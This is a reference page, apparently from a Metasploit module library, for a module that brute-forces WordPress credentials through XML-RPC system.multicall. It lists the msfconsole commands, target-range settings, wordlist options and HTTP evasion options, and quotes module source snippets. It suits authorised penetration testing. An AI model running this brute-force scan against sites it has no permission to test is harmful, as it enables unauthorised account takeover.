Wordpress XML-RPC system.multicall Credential Collector - Metasploit


This page contains detailed information about how to use the auxiliary/scanner/http/wordpress_multicall_creds metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Wordpress XML-RPC system.multicall Credential Collector
Module: auxiliary/scanner/http/wordpress_multicall_creds
Source code: modules/auxiliary/scanner/http/wordpress_multicall_creds.rb
Disclosure date: -
Last modification time: 2021-08-31 15:37:48 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -

This module attempts to find Wordpress credentials by abusing the XMLRPC APIs. Wordpress versions prior to 4.4.1 are suitable for this type of technique. For newer versions, the script will drop the CHUNKSIZE to 1 automatically.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/scanner/http/wordpress_multicall_creds
msf auxiliary(wordpress_multicall_creds) > show options
    ... show and set options ...
msf auxiliary(wordpress_multicall_creds) > set RHOSTS ip-range
msf auxiliary(wordpress_multicall_creds) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(wordpress_multicall_creds) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(wordpress_multicall_creds) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(wordpress_multicall_creds) > set RHOSTS file:/tmp/ip_list.txt

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the scanner/http/wordpress_multicall_creds auxiliary module looks in the msfconsole:

msf6 > use auxiliary/scanner/http/wordpress_multicall_creds

msf6 auxiliary(scanner/http/wordpress_multicall_creds) > show info

       Name: Wordpress XML-RPC system.multicall Credential Collector
     Module: auxiliary/scanner/http/wordpress_multicall_creds
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  KingSabri <[email protected]>
  William <[email protected]>
  sinn3r <[email protected]>

Check supported:
  No

Basic options:
  Name              Current Setting                                                                     Required  Description
  ----              ---------------                                                                     --------  -----------
  BLOCKEDWAIT       6                                                                                   yes       Time(minutes) to wait if got blocked
  BRUTEFORCE_SPEED  5                                                                                   yes       How fast to bruteforce, from 0 to 5
  CHUNKSIZE         1500                                                                                yes       Number of passwords need to be sent per request. (1700 is the max)
  DB_ALL_USERS      false                                                                               no        Add all users in the current database to the list
  PASS_FILE         /opt/metasploit-framework/embedded/framework/data/wordlists/http_default_pass.txt   no        File containing passwords, one per line
  Proxies                                                                                               no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                                                                                                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT             80                                                                                  yes       The target port (TCP)
  SSL               false                                                                               no        Negotiate SSL/TLS for outgoing connections
  STOP_ON_SUCCESS   false                                                                               yes       Stop guessing when a credential works for a host
  TARGETURI         /                                                                                   yes       The base path to the wordpress application
  THREADS           1                                                                                   yes       The number of concurrent threads (max one per host)
  USERNAME                                                                                              no        A specific username to authenticate as
  USER_FILE         /opt/metasploit-framework/embedded/framework/data/wordlists/http_default_users.txt  no        File containing usernames, one per line
  VERBOSE           true                                                                                yes       Whether to print output for all attempts
  VHOST                                                                                                 no        HTTP server virtual host

Description:
  This module attempts to find Wordpress credentials by abusing the 
  XMLRPC APIs. Wordpress versions prior to 4.4.1 are suitable for this 
  type of technique. For newer versions, the script will drop the 
  CHUNKSIZE to 1 automatically.

References:
  https://blog.cloudflare.com/a-look-at-the-new-wordpress-brute-force-amplification-attack/
  https://blog.sucuri.net/2014/07/new-brute-force-attacks-exploiting-xmlrpc-in-wordpress.html

Module Options


This is a complete list of options available in the scanner/http/wordpress_multicall_creds auxiliary module:

msf6 auxiliary(scanner/http/wordpress_multicall_creds) > show options

Module options (auxiliary/scanner/http/wordpress_multicall_creds):

   Name              Current Setting                                                                     Required  Description
   ----              ---------------                                                                     --------  -----------
   BLOCKEDWAIT       6                                                                                   yes       Time(minutes) to wait if got blocked
   BRUTEFORCE_SPEED  5                                                                                   yes       How fast to bruteforce, from 0 to 5
   CHUNKSIZE         1500                                                                                yes       Number of passwords need to be sent per request. (1700 is the max)
   DB_ALL_USERS      false                                                                               no        Add all users in the current database to the list
   PASS_FILE         /opt/metasploit-framework/embedded/framework/data/wordlists/http_default_pass.txt   no        File containing passwords, one per line
   Proxies                                                                                               no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                                                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             80                                                                                  yes       The target port (TCP)
   SSL               false                                                                               no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                                                                               yes       Stop guessing when a credential works for a host
   TARGETURI         /                                                                                   yes       The base path to the wordpress application
   THREADS           1                                                                                   yes       The number of concurrent threads (max one per host)
   USERNAME                                                                                              no        A specific username to authenticate as
   USER_FILE         /opt/metasploit-framework/embedded/framework/data/wordlists/http_default_users.txt  no        File containing usernames, one per line
   VERBOSE           true                                                                                yes       Whether to print output for all attempts
   VHOST                                                                                                 no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the scanner/http/wordpress_multicall_creds auxiliary module:

msf6 auxiliary(scanner/http/wordpress_multicall_creds) > show advanced

Module advanced options (auxiliary/scanner/http/wordpress_multicall_creds):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   MaxGuessesPerService  0                                                   no        Maximum number of credentials to try per service instance. If set to zero or a non-number, this option will not be used.
   MaxGuessesPerUser     0                                                   no        Maximum guesses for a particular username for the service instance. Note that users are considered unique among different services, so a user at 10.1.1.1:22
                                                                                        is different from one at 10.2.2.2:22, and both will be tried up to the MaxGuessesPerUser limit. If set to zero or a non-number, this option will not be use
                                                                                       d.
   MaxMinutesPerService  0                                                   no        Maximum time in minutes to bruteforce the service instance. If set to zero or a non-number, this option will not be used.
   REMOVE_PASS_FILE      false                                               yes       Automatically delete the PASS_FILE on module completion
   REMOVE_USERPASS_FILE  false                                               yes       Automatically delete the USERPASS_FILE on module completion
   REMOVE_USER_FILE      false                                               yes       Automatically delete the USER_FILE on module completion
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   ShowProgress          true                                                yes       Display progress messages during a scan
   ShowProgressPercent   10                                                  yes       The interval in percent that progress should be shown
   TRANSITION_DELAY      0                                                   no        Amount of time (in minutes) to delay before transitioning to the next user in the array (or password when PASSWORD_SPRAY=true)
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   WORKSPACE                                                                 no        Specify the workspace for this module
   WPCHECK               true                                                yes       Check if the website is a valid WordPress install
   WPCONTENTDIR          wp-content                                          yes       The name of the wp-content directory

Auxiliary Actions


This is a list of all auxiliary actions that the scanner/http/wordpress_multicall_creds module can do:

msf6 auxiliary(scanner/http/wordpress_multicall_creds) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the scanner/http/wordpress_multicall_creds auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(scanner/http/wordpress_multicall_creds) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Option CHUNKSIZE cannot be larger than 1700


Here is a relevant code snippet related to the "Option CHUNKSIZE cannot be larger than 1700" error message:

56:	    File.readlines(datastore['PASS_FILE']).lazy.map {|pass| pass.chomp}
57:	  end
58:	
59:	  def check_options
60:	    if datastore['CHUNKSIZE'] > 1700
61:	      fail_with(Failure::BadConfig, 'Option CHUNKSIZE cannot be larger than 1700')
62:	    end
63:	  end
64:	
65:	  def setup
66:	    check_options

<PEER>:<RPORT><TARGET_URI> does not appear to be running Wordpress or you got blocked! (Do Manual Check)


Here is a relevant code snippet related to the "<PEER>:<RPORT><TARGET_URI> does not appear to be running Wordpress or you got blocked! (Do Manual Check)" error message:

69:	  def check_setup
70:	    version = wordpress_version
71:	    vprint_good("Found Wordpress version: #{version}")
72:	
73:	    if !wordpress_and_online?
74:	      print_error("#{peer}:#{rport}#{target_uri} does not appear to be running Wordpress or you got blocked! (Do Manual Check)")
75:	      false
76:	    elsif !wordpress_xmlrpc_enabled?
77:	      print_error("#{peer}:#{rport}#{wordpress_url_xmlrpc} does not enable XMLRPC")
78:	      false
79:	    elsif Rex::Version.new(version) >= Rex::Version.new('4.4.1')

<PEER>:<RPORT><WORDPRESS_URL_XMLRPC> does not enable XMLRPC


Here is a relevant code snippet related to the "<PEER>:<RPORT><WORDPRESS_URL_XMLRPC> does not enable XMLRPC" error message:

72:	
73:	    if !wordpress_and_online?
74:	      print_error("#{peer}:#{rport}#{target_uri} does not appear to be running Wordpress or you got blocked! (Do Manual Check)")
75:	      false
76:	    elsif !wordpress_xmlrpc_enabled?
77:	      print_error("#{peer}:#{rport}#{wordpress_url_xmlrpc} does not enable XMLRPC")
78:	      false
79:	    elsif Rex::Version.new(version) >= Rex::Version.new('4.4.1')
80:	      print_error("#{peer}#{wordpress_url_xmlrpc} Target's version (#{version}) is not vulnerable to this attack.")
81:	      vprint_status("Dropping CHUNKSIZE from #{datastore['CHUNKSIZE']} to 1")
82:	      datastore['CHUNKSIZE'] = 1

<PEER><WORDPRESS_URL_XMLRPC> Target's version (<VERSION>) is not vulnerable to this attack.


Here is a relevant code snippet related to the "<PEER><WORDPRESS_URL_XMLRPC> Target's version (<VERSION>) is not vulnerable to this attack." error message:

75:	      false
76:	    elsif !wordpress_xmlrpc_enabled?
77:	      print_error("#{peer}:#{rport}#{wordpress_url_xmlrpc} does not enable XMLRPC")
78:	      false
79:	    elsif Rex::Version.new(version) >= Rex::Version.new('4.4.1')
80:	      print_error("#{peer}#{wordpress_url_xmlrpc} Target's version (#{version}) is not vulnerable to this attack.")
81:	      vprint_status("Dropping CHUNKSIZE from #{datastore['CHUNKSIZE']} to 1")
82:	      datastore['CHUNKSIZE'] = 1
83:	      true
84:	    else
85:	      print_status("Target #{peer} is running Wordpress")

Abborting the attack.


Here is a relevant code snippet related to the "Abborting the attack." error message:

89:	
90:	  def run_host(ip)
91:	    if check_setup
92:	      print_status("XMLRPC enabled, Hello message received!")
93:	    else
94:	      print_error("Abborting the attack.")
95:	      return
96:	    end
97:	
98:	    print_status("#{peer} - Starting XML-RPC login sweep...")
99:	

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • KingSabri <King.Sabri[at]gmail.com>
  • William <WCoppola[at]Lares.com>
  • sinn3r

Version


This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.